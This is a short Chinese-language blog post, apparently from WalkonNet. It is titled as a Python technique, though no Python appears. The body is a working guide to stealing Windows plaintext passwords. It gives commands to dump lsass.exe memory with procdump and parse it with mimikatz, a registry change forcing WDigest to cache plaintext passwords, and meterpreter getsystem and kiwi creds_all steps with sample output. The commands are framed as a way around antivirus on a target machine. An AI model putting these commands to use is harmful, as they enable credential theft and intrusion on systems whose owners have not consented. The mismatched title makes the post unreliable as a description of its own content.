python簡單直接獲取windows明文密碼操作技巧

Posted on by

01、Procdump+Mimikatz

利用procdump+Mimikatz 繞過殺軟獲取Windows明文密碼。

(1)工具準備:

ProcDump:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

mimikatz:

https://github.com/gentilkiwi/mimikatz/

(2)Windows Server 2008 R2提取明文密碼

在目標機器上生成存儲文件:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

28ff828ad9dc41f836b56f21c0539199.png

將lsass.dmp復制到本地,使用mimikatz 一行命令將結果輸出到文本。

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"> pssword.txt

如圖:成功從內存中提取明文密碼。

313f61ce69afdb6dd81d5799061cc2b3.png

02、Window 2012 R2抓取密碼

在Windows2012系統及以上的系統,默認在內存緩存中禁止保存明文密碼的。攻擊者可以通過修改註冊表的方式抓取明文,需要用戶重新登錄後才能成功抓取。

(1)修改註冊表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

(2)用戶administrator註銷後重新登錄,成功抓取到明文信息。

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt

6bf5bf93d637794f12177436ca146737.png

03、MSF kiwi模塊

使用kiwi模塊需要system權限,所以我們在使用該模塊之前需要將當前MSF中的shell提升為system。

提到system有兩個方法,一是當前的權限是administrator用戶,二是利用其它手段先提權到administrator用戶。然後administrator用戶可以直接getsystem到system權限。

meterpreter > getuid
Server username: BYPASS-E97BA3FC\Administrator
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

加載kiwi模塊:

load kiwi

列舉系統中的明文密碼:

creds_all

cdc6292a7aaba1f4ba86e7b526fe55ae.png

以上就是python簡單直接獲取windows明文密碼操作技巧的詳細內容,更多關於python獲取windows明文密碼的資料請關註WalkonNet其它相關文章!

推薦閱讀: